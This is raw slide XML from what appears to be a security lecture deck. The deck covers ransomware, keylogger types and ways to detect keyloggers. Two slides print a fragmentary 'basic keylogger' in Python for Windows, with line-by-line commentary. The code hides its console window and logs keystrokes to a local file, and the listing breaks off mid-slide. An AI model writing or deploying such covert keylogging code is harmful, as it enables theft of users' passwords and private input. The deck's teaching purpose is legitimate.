Shape;245;p2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46" name="Google Shape;246;p2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47" name="Google Shape;247;p2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48" name="Google Shape;248;p2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49" name="Google Shape;249;p2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50" name="Google Shape;250;p2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51" name="Google Shape;251;p2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52" name="Google Shape;252;p2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TECHNIQUES</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="253" name="Google Shape;253;p23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="206475" y="1469136"/>
            <a:ext cx="15614550" cy="2445639"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="216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Ransomware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 Using malicious attachments or links in emails to infect systems.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 Exploiting vulnerabilities to gain initial access before deploying ransomware.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254" name="Google Shape;254;p2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60" name="Google Shape;260;p2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61" name="Google Shape;261;p2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62" name="Google Shape;262;p2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63" name="Google Shape;263;p2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64" name="Google Shape;264;p2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65" name="Google Shape;265;p2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66" name="Google Shape;266;p2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67" name="Google Shape;267;p2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KEYLOGGERS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="268" name="Google Shape;268;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="216000" y="1469136"/>
            <a:ext cx="13106300" cy="29314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A keylogger, short for "keystroke logger," is a type of software or hardware device designed to record and monitor every keystroke made on a computer or mobile device. The primary purpose of keyloggers is to capture the input entered by a user, including sensitive information such as usernames, passwords, credit card numbers, and other confidential data.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="269" name="Google Shape;269;p2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pic>
        <p:nvPicPr>
          <p:cNvPr id="270" name="Google Shape;270;p24"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="13125532" y="4211321"/>
            <a:ext cx="4965697" cy="459327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76" name="Google Shape;276;p2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77" name="Google Shape;277;p2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78" name="Google Shape;278;p2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79" name="Google Shape;279;p2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80" name="Google Shape;280;p2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81" name="Google Shape;281;p2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82" name="Google Shape;282;p2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83" name="Google Shape;283;p2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KEYLOGGERS - TYPES</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="284" name="Google Shape;284;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="216000" y="1469136"/>
            <a:ext cx="1310630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Software Keyloggers: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Installed as software on a computer or device.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Can run in the background, capturing keystrokes without the user's knowledge.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Often disguised or hidden to avoid detection.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Hardware Keyloggers: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Physical devices connected between the computer and keyboard.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Capture keystrokes before they reach the computer's operating system.</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Difficult to detect without a physical inspection.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Memory-Injecting Keyloggers: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Inject malicious code into the memory of a running process.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Capture keystrokes directly from the memory space of applications.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Can evade traditional antivirus detection.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285" name="Google Shape;285;p2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pic>
        <p:nvPicPr>
          <p:cNvPr id="286" name="Google Shape;286;p25"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="13007340" y="4211321"/>
            <a:ext cx="4965697" cy="45932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92" name="Google Shape;292;p2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93" name="Google Shape;293;p2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94" name="Google Shape;294;p2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95" name="Google Shape;295;p2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96" name="Google Shape;296;p2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97" name="Google Shape;297;p2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98" name="Google Shape;298;p2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99" name="Google Shape;299;p2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to check if my system is affected with a Keylogger?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="300" name="Google Shape;300;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="757287" y="1818574"/>
            <a:ext cx="16773425" cy="7214616"/>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Use Antivirus and Anti-Malware Software:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="690879" marR="0" lvl="1" indent="-345439" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="108002"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="212121"/>
              </a:buClr>
              <a:buSzPts val="3199"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3199" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Run a full system scan using reputable antivirus and anti-malware software. Ensure that your security software is up to date and capable of detecting keyloggers.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="108002"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="3199"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Check Task Manager (Windows) or Activity Monitor (Mac):</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="690881" marR="0" lvl="1" indent="-345439" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="108000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="212121"/>
              </a:buClr>
              <a:buSzPts val="3200"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Look for any suspicious processes running on your system. Keyloggers may be disguised as legitimate processes, so pay attention to unfamiliar or suspicious entries.</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Review Installed Programs:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="690881" marR="0" lvl="1" indent="-345439" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="108000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="212121"/>
              </a:buClr>
              <a:buSzPts val="3200"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Check the list of installed programs on your computer and uninstall any unfamiliar or suspicious software.</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Inspect Startup Programs:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="690882" marR="0" lvl="1" indent="-345440" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="108000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="212121"/>
              </a:buClr>
              <a:buSzPts val="3200"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Examine the list of programs set to run at startup. Keyloggers may attempt to run every time you start your computer. On Windows, you can use the Task Manager or msconfig, and on Mac, you can check System Preferences &gt; Users &amp; Groups &gt; Login Items.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="301" name="Google Shape;301;p2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307" name="Google Shape;307;p2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308" name="Google Shape;308;p2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09" name="Google Shape;309;p2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310" name="Google Shape;310;p2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11" name="Google Shape;311;p2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12" name="Google Shape;312;p2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13" name="Google Shape;313;p2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14" name="Google Shape;314;p2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to check if my system is affected with a Keylogger?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="315" name="Google Shape;315;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="757287" y="1818574"/>
            <a:ext cx="16773425" cy="6633591"/>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Monitor Network Activity:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="690882" marR="0" lvl="1" indent="-345440" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="108000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="212121"/>
              </a:buClr>
              <a:buSzPts val="3200"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Use network monitoring tools to check for unusual network activity. Keyloggers may send captured data to remote servers. Tools like Wireshark can help you analyze network traffic.</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Inspect System Logs:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="690882" marR="0" lvl="1" indent="-345440" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="108000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="212121"/>
              </a:buClr>
              <a:buSzPts val="3200"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Check system logs for any unusual activities. On Windows, you can use the Event Viewer, and on Mac, you can check the Console app. Look for any entries that indicate suspicious behavior.</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Use a Virtual Keyboard:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="690882" marR="0" lvl="1" indent="-345440" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="108000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="212121"/>
              </a:buClr>
              <a:buSzPts val="3200"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>If you suspect a hardware keylogger, using a virtual keyboard for sensitive tasks can help you bypass the physical keylogger.</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Check for Unusual Behavior:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="690882" marR="0" lvl="1" indent="-345440" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="108000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="212121"/>
              </a:buClr>
              <a:buSzPts val="3200"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Pay attention to any unusual behavior on your system, such as unexpected pop-ups, system slowdowns, or changes in settings.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="316" name="Google Shape;316;p2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322" name="Google Shape;322;p2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323" name="Google Shape;323;p2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24" name="Google Shape;324;p2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325" name="Google Shape;325;p2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26" name="Google Shape;326;p2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27" name="Google Shape;327;p28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="768184" y="1172417"/>
            <a:ext cx="15830680" cy="8659918"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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import win32api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import win32console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import win32gui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import pythoncom, pyHook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win = win32console.GetConsoleWindow()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win32gui.ShowWindow(win, 0)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def OnKeyboardEvent(event):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if event.Ascii==5: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_exit(1)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if event.Ascii !=0 or 8: </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="108011"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="3208"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1"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="3208"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#open output.txt to read current keystrokes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f = open('c:\output.txt', 'r+')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buffer = f.read()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f.close() </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="108011"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3208" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="108011"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="3208" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="212121"/>
              </a:solidFill>
              <a:latin typeface="Roboto Condensed"/>
              <a:ea typeface="Roboto Condensed"/>
              <a:cs typeface="Roboto Condensed"/>
              <a:sym typeface="Roboto Condensed"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="328" name="Google Shape;328;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5268906" y="1683140"/>
            <a:ext cx="2626139" cy="794407"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2626139" h="794407" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2626139" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2626139" y="794407"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="794407"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill rotWithShape="1">
            <a:blip r:embed="rId5">
              <a:alphaModFix/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="329" name="Google Shape;329;p2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30" name="Google Shape;330;p2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31" name="Google Shape;331;p2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Basic Keylogger Code in Python for Windows</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="332" name="Google Shape;332;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6915890" y="3669540"/>
            <a:ext cx="2552800" cy="772222"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2552800" h="772222" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2552800" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2552800" y="772222"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="772222"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill rotWithShape="1">
            <a:blip r:embed="rId5">
              <a:alphaModFix/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="333" name="Google Shape;333;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5167306" y="5143500"/>
            <a:ext cx="2727739" cy="825141"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2727739" h="825141" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2727739" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2727739" y="825141"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="825141"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill rotWithShape="1">
            <a:blip r:embed="rId5">
              <a:alphaModFix/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="334" name="Google Shape;334;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5825798" y="7884834"/>
            <a:ext cx="2391298" cy="723368"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2391298" h="723368" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2391298" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2391298" y="723368"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="723368"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill rotWithShape="1">
            <a:blip r:embed="rId5">
              <a:alphaModFix/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="335" name="Google Shape;335;p28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8217096" y="1337394"/>
            <a:ext cx="8381768" cy="14859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90" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="5C2421"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Here, the necessary libraries are imported. win32api, win32console, and win32gui are part of the Windows API and are used for manipulating the Windows operating system. pythoncom and pyHook are used for hooking into low-level events in Python.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="336" name="Google Shape;336;p28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9472498" y="3458688"/>
            <a:ext cx="8482710" cy="15335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505" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="5C2421"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>These lines hide the console window where the Python script is running. win32console.GetConsoleWindow() gets the handle to the console window, and win32gui.ShowWindow(win, 0) hides it. This is done to run the keylogger without a visible console window.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="337" name="Google Shape;337;p28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8049415" y="5268438"/>
            <a:ext cx="8431379" cy="15335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505" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="5C2421"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>This part defines a function OnKeyboardEvent that will be called whenever a keyboard event occurs. If the ASCII value of the key pressed is 5 (Ctrl + E), it calls _exit(1) to terminate the script. If the ASCII value is not 0 or 8 (Backspace), it continues to the next part.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="338" name="Google Shape;338;p28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8401584" y="7699691"/>
            <a:ext cx="8431379" cy="11525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505" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="5C2421"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Here, it opens the file 'c:\output.txt' in read and write mode ('r+'), reads the existing content into the buffer variable, and then closes the file.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="339" name="Google Shape;339;p2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345" name="Google Shape;345;p2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346" name="Google Shape;346;p2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47" name="Google Shape;347;p2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348" name="Google Shape;348;p2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49" name="Google Shape;349;p2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50" name="Google Shape;350;p2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51" name="Google Shape;351;p2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52" name="Google Shape;352;p2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Basic Keylogger Code in Python for Windows</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="353" name="Google Shape;353;p29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="614412" y="1138429"/>
            <a:ext cx="16773425" cy="7478268"/>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 open output.txt to write current + new keystrokes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f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> open('c:\output.txt', 'w')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keylogs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
